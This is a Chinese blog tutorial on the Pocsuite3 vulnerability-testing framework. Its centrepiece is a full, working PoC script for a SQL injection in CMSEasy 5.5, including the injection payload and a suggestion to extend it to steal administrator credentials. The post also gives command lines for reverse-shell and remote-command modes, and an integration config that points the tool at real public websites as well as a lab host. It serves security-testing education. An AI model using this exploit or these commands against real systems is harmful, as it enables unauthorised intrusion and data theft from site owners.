使用Pocsuite3

最新推荐文章于 2024-04-25 09:37:31 发布
最新推荐文章于 2024-04-25 09:37:31 发布
阅读量1.3k 收藏 6
点赞数 1
分类专栏: 工具的使用
原文链接:https://blog.csdn.net/weixin_44426869/article/details/103962994
版权

简介和安装
在此框架下,有编写其POC的指定规则
以CMSEasy5.5的SQL注入漏洞PoC为例

1、首先创建.py文件,命名规则:

PoC命名分成3个部分组成漏洞应用名_版本号_漏洞类型名称 然后把文件名称中的所有字母改成小写,所有的符号改成_. 文件
例子的.py文件名为:_88979_cmseasy_5_5_sql_injection.py

2、PoC如下:
poc参考地址

#导入所写PoC所需要类/文件,尽量不要使用第三方模块。
#迫不得已使用第三方模块有其依赖规则,后面给出。
from pocsuite3.api import Output,POCBase,register_poc,requests
#PoC实现类,继承POCBase
class DemoPoc(POCBase):
	#PoC信息字段,需要完整填写全部下列信息
	vulID = '88979' #漏洞编号,若提交漏洞的同时提交PoC,则写成0
    version = '1'#PoC版本,默认为1
    author = ['blh']#此PoC作者
    vulDate = '2014-11-03'#漏洞公开日期
    createDate = '2020-01-13'#编写PoC日期
    updateDate = '2020-01-13'#更新PoC日期,默认与createDate一样
    references = ['https://www.seebug.org/vuldb/ssvid-88979']#漏洞地址来源,0day不写
    name = 'CMSEasy 5.5 /celive/live/header.php SQL注入漏洞'#PoC名称
    appPowerLink = 'http://www.cmseasy.cn/'#漏洞产商主页
    appName = 'CMSEasy'#漏洞应用名称
    appVersion = '5.5'#漏洞影响版本
    vulType = 'SQL Injection'#漏洞类型
    desc = '''漏洞描述'''#在漏洞描述填写
    samples = []#测试成功网址
    install_requires = []#PoC依赖的第三方模块,尽量不要使用第三方模块,必要时参考后面给出的参考链接
    pocDesc = '''PoC用法描述'''#在PoC用法描述填写
    
 	#编写验证模式
	def  _verify(self):
        #验证代码
        result = {}
        target = self.url + '/celive/live/header.php'
        #此处payload即为post的数据
        payload = {
            'xajax': 'LiveMessage',
            'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
                                  "floor(rand(0)*2),(select md5(614)))a from "
                                  "information_schema.tables group by a)b),"
                                  "'','','','1','127.0.0.1','2') #"
        }
        # 使用requests发送post请求
        response = requests.post(target,payload)
        #‘851ddf5058cf22df63d3344ad89919cf’为0614的md5值
        if '851ddf5058cf22df63d3344ad89919cf' in str(response.content):
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = target
            result['VerifyInfo']['Postdata'] = payload
        return self.parse_output(result)
	#编写攻击模式,此处直接给到验证模式,读者可以自行写出payload,获取管理员账号密码等信息。
	def _attack(self):
        return self._verify()
	#自定义输出函数,调用框架输出的实例Output
	def parse_output(self,result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

#注册PoC类,这样框架才知道这是PoC类
register_poc(DemoPoc)

更多的规则和自定义函数:参考连接

常用命令调用

常用命令如下:(进入pocsuite3目录下使用)

pocsuite -u http://test.com -r test.py --verify #使用test.py这个PoC去检测http://test.com这个url
pocsuite -u http://test.com -r test.py --verify --shell # shell反连模式
pocsuite -u http://test.com -r ecshop_rce.py --attack --command "whoami" # pocsuite3中自带的ecshop poc中实现了自定义命令`command`,可以从外部参数传递
pocsuite -f url.txt -r test.py --verify #使用test.py这个PoC去检测url.txt文件里所有的url
#应该有个检测多个PoC的,但不知道怎么写命令,希望有师傅告知

例如:(实验中的成功案例是使用上面参考链接中的CMS和phpStudy搭建的环境)

在这里插入图片描述
集成调用

pocsuite3 api 提供了集成pocsuite3的全部功能函数。典型集成调用方法如下:

from pocsuite3.api import init_pocsuite
from pocsuite3.api import start_pocsuite
from pocsuite3.api import get_results
#config中给出三个url和两个PoC
config = {
    'url': {'https://www,baidu.com','https://www.4399.com','http://192.168.246.130/cmsEasy/uploads'},
    'poc': {'E:\python\python3.8.0\Lib\site-packages\pocsuite3\pocs\\thinkphp_rce.py','E:\python\python3.8.0\Lib\site-packages\pocsuite3\pocs\mypoc\_88979_cmseasy_5_5_sql_injection.py'}
}
# config字典的配置和cli命令行参数配置一模一样
init_pocsuite(config)
start_pocsuite()
result = get_results().pop()
print(result)

可以直接用命令行调用此python文件或者在IDE中直接执行。
在这里插入图片描述在这里插入图片描述

Mamba start
关注
专栏目录
使用pocsuite3模块编写poc脚本
H4ppyD0g的博客
09-11 1479
pocsuite3是由知道创宇404实验室开发维护的开源远程漏洞测试和概念验证开发框架,基于python3。poc脚本可以运行在 attack,verify, shell 等模式下。
pocsuite3pocsuite3是由Knownsec 404团队开发的开源远程漏洞测试框架
02-05
pocsuite3 法律免责声明 未经事先双方同意,使用Pocsuite攻击目标是非法的。 pocsuite仅用于安全测试 法律免责声明 事先事先双方同意,使用pocsuite攻击目标是非法的。 pocsuite仅用于安全测试目的 总览 pocsuite3是由开发的开源远程漏洞测试和概念验证开发框架。 它带有强大的概念验证引擎,以及针对最终渗透测试人员和安全研究人员的许多强大功能。 产品特点 PoC脚本可以以不同的方式在attack , verify , shell模式下运行 插件生态系统 从任何位置(本地文件,redis,数据库,Seebug ...)动态加载PoC脚本 从任何位置(CIDR
探索未知,揭秘安全:Pocsuite3 - 一个强大的渗透测试框架
最新发布
gitblog_00042的博客
04-25 434
探索未知,揭秘安全:Pocsuite3 - 一个强大的渗透测试框架 项目地址:https://gitcode.com/knownsec/pocsuite3 项目简介 Pocsuite3 是由知名安全研究团队 KnownSec 开发的一款开源的漏洞验证和利用工具,它是 Pocsuite2 的升级版,提供了更加强大、灵活且易于使用的功能,旨在帮助安全研究人员和渗透测试工程师进行网络环境的安全评估和漏洞...
PocSuite3:一款开源远程漏洞测试框架
systemino的博客
05-26 666
今天给大家介绍的是一款名叫PocSuite3的开源漏洞测试框架,该工具由著名的Knownsec 404安全研究团队开发,广大安全人员可以利用该工具进行远程漏洞测试。 PocSuite3 PocSuite3是Knownsec 404安全研究团队设计的一款远程漏洞测试以及PoC开发框架,该框架使用了功能极其强大的概念验证引擎,并自带了大量渗透测试以及安全分析功能。中国菜刀 功能介绍 1、P...
Pocsuite3使用
Qeminco的博客。
01-03 4477
简介 Pocsuite3官方介绍及下载链接 pocsuite3安装 在pocsuite3目录下进入命令窗口。 在使用之前你可能需要安装以下python库。 pip install chardet pip install termcolor pip install colorlog pip install socks pip install prettytable pip install faker 然后在pocsuite3目录下执行python cli.py -h 如果出现报错信息ModuleNotFou
pocsuite3安装及使用
m0_52051132的博客
03-09 3065
pocsuite3 是由 知道创宇 404实验室 开发维护的开源远程漏洞测试和概念验证开发框架。
使用Pocsuite3编写漏洞exp的步骤是什么
04-01
使用Pocsuite3编写漏洞exp的步骤如下: 1. 确定漏洞类型和漏洞目标:首先要确定漏洞类型和目标,包括操作系统、软件版本等信息。 2. 查找漏洞信息:通过搜索和查找各种漏洞信息来源,例如CVE、CNVD、漏洞公告、...
PyPI 官网下载 | pocsuite3-1.3.2.zip
02-11
使用pocsuite3进行安全测试时,应遵循安全最佳实践,包括但不限于: - 对目标系统有充分了解,避免误操作导致业务中断。 - 及时更新pocsuite3,确保使用最新的漏洞库和修复措施。 - 在非生产环境中进行测试,...
Poc框架:Pocsuite3简介、安装、基本使用
热门推荐
汗的博客
12-03 1万+
简介 pocsuite3 是由 知道创宇 404实验室 开发维护的开源远程漏洞测试和概念验证开发框架。 项目地址 https://github.com/knownsec/pocsuite3 漏洞测试框架 Pocsuite3 采用 Python3 编写,支持验证,利用 及 shell 三种插件模式,你可以指定单个目标或者从文件导入多个目标,使用单个 PoC 或者 PoC 集合进行漏洞的验证或利用。可以使用命令行模式进行调用,也支持类似 Metaspolit 的交互模式进行处理,除此之外,还包含了一些基本的如输
如何打造自己的PoC框架-Pocsuite3-使用
晓得哥的博客
04-25 2734
相比于无聊的用法介绍,我更想说一下Pocsuite3为什么会有这些功能以及是如何实现的。如果你也想制造一款类似的工具,Pocsuite3的一些思想或许能够帮助到你。本文同时也是记录Pocsuite3开发过程中的一些思考与理解。 简介 Pocsuite 是由知道创宇404实验室打造的一款开源的远程漏洞测试框架。它是知道创宇安全研究团队发展的基石,是团队发展至今一直维护的一个项目,保障了我们的 Web...
some_pocsuite:用于漏洞排查的pocsuite3验证POC代码
05-23
some_pocsuite 用于企业内部进行漏洞排查与验证的的pocsuite3验证POC代码(pocsuite3是知道创宇安全团队的开源漏洞测试框架)。 由于原Pocsuite已停止更新,因此将原来的POC代码全部重新改写并迁移到pocsuite3,原POC备份在PocsuiteV2中。 插件代码编写 使用pocsuite3 漏洞测试框架,插件编写请参考 pocsuite3 项目插件编写要求。 序号 poc 说明 1 hikvision-2013-4976_web_login-bypass.py 海康威视cve-2013-4976匿名登录验证绕过 2 weblogic-vul-check_all_rce.py weblogic反序列化漏洞(CVE-2016-0638,CVE-2016-3510,CVE-2017-3248,CVE-2018-2628,CVE-2018-2893, CVE-
Pocsuite3的安装与使用
npc88888的博客
03-14 568
attack 模式获取命令行参数执行并返回结果。访问docker的ip和端口就能访问靶场了。然后就是搭建 docker 靶场测试了。现在可以愉快的练习exp啦。安装docker容器。验证完后删除镜像文件。
Pocsuite3工具介绍
m0_58001548的博客
05-30 1626
Pocsuite3 基于 Python3 开发,可以运行在支持 Python 3.7+ 的任何平台上,例如 Linux、Windows、MacOS、BSD 等。2021 年 11 月,Pocsuite3 通过了 Debian 官方的代码及合规检查,正式加入 Debian、Ubuntu、Kali 等 Linux 发行版的软件仓库,可以通过 apt 命令一键获取。
Pocsuite3编写poc——以Grafana任意文件读取为例
weixin_44522540的博客
09-06 1528
pocsuite3
Pocsuite3渗透测试框架编写POC和EXP脚本
悦分享
07-07 5786
一、Pocsuite3简介编写poc和exp并不是大佬们才会的,借助于某些框架,小白也可以编写自己的poc和exp,并且实现批量刷SRC。我们这里使用Pocsuite 3 来实现自己编写脚本,Pocsuite是由”知道创宇404实验室”打造的一款开源的远程漏洞测试框架,你可以直接使用它进行漏洞的验证与利用,也可以基于它进行POC/EXP的开发Pocsuite 3用Pyhton3编写,支持verify、attack及shell三种模式,可以通过指定单个目标或者从文件中导入多个目标,使用单个POC或者POC集合
Docker的搭建和Poc框架Pocsuite3使用
qq_51585635的博客
03-27 6200
一行命令安装 Pocsuite3
Pocsuite3源码的分析(一)
qq_40997679的博客
10-06 1296
位于cli.py中第53行,init()此函数主要作用是pocsuite运行的一系列初始化工作,定义在lib\core\option.py模块中,其中定义了控制台日志的详细程度、清理配置、基础信息的验证、创建一些目录、创建Poc模版、加载Poc、判断是否使用一些插件、一些数据包的参数用户是否自定义。其中_set_conf_attributes()是初始化conf这个重要的变量 conf初始化了70个键值对。位于cli.py中第50行,init_options(cmd_line_parser().
Pocsuite3框架POC/EXP编写练习:Flask(Jinja2) 服务端模板注入漏洞
qq_46145027的博客
04-19 974
Pocsuite3 是由打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架。可以用来编写POC/EXP,今天借助Flask框架下的SSTI漏洞练习记录一下Pocsuite3框架的配置和编写过程。
生命在于学习——初识pocsuite3框架
易水哲的博客
10-16 1743
本篇文章记录的是pocsuite3框架
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值